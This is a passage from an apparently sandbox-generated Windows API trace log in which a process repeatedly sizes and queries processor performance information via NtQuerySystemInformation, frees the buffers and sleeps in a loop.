SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0306.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0306.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0306.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0306.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0306.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.490] Sleep (dwMilliseconds=0x110) [0306.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0306.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0306.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0306.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0306.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0306.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.512] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0306.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0306.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0306.515] Sleep (dwMilliseconds=0x110) [0306.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0306.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0306.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0306.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0306.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0306.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0306.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0306.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0306.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.537] Sleep (dwMilliseconds=0x110) [0306.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0306.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0306.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0306.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0306.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0306.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0306.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.551] Sleep (dwMilliseconds=0x110) [0306.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0306.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0306.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0306.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0306.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0306.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0306.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0306.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0306.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0306.567] Sleep (dwMilliseconds=0x110) [0306.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0306.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0306.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0306.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0306.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0306.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0306.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0306.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0306.581] Sleep (dwMilliseconds=0x110) [0306.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0306.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0306.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0306.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0306.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0306.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0306.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0306.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0306.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e2510 [0306.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e2510 | out: hHeap=0x2560000) returned 1 [0306.601] Sleep (dwMilliseconds=0x110) [0306.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0306.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0306.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0306.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0306.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0306.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0306.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0306.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0306.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.617] Sleep (dwMilliseconds=0x110) [0306.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0306.636] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.637] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0306.637] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0306.637] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0306.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0306.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0306.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0306.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0306.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0306.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0306.639] Sleep (dwMilliseconds=0x110) [0306.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0306.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0306.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0306.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0306.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0306.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0306.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0306.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0306.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0306.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0306.673] Sleep (dwMilliseconds=0x110) [0306.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0306.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0306.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0306.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0306.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0306.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0306.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0306.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0306.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0306.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0306.692] Sleep (dwMilliseconds=0x110) [0306.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0306.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0306.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0306.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0306.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0306.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0306.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0306.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0306.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0306.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0306.707] Sleep (dwMilliseconds=0x110) [0306.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0306.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0306.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0306.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0306.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0306.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0306.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0306.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0306.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0306.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0306.722] Sleep (dwMilliseconds=0x110) [0306.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0306.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0306.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0306.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0306.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0306.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0306.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0306.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0306.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0306.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0306.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0306.742] Sleep (dwMilliseconds=0x110) [0306.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0306.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0306.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0306.752] 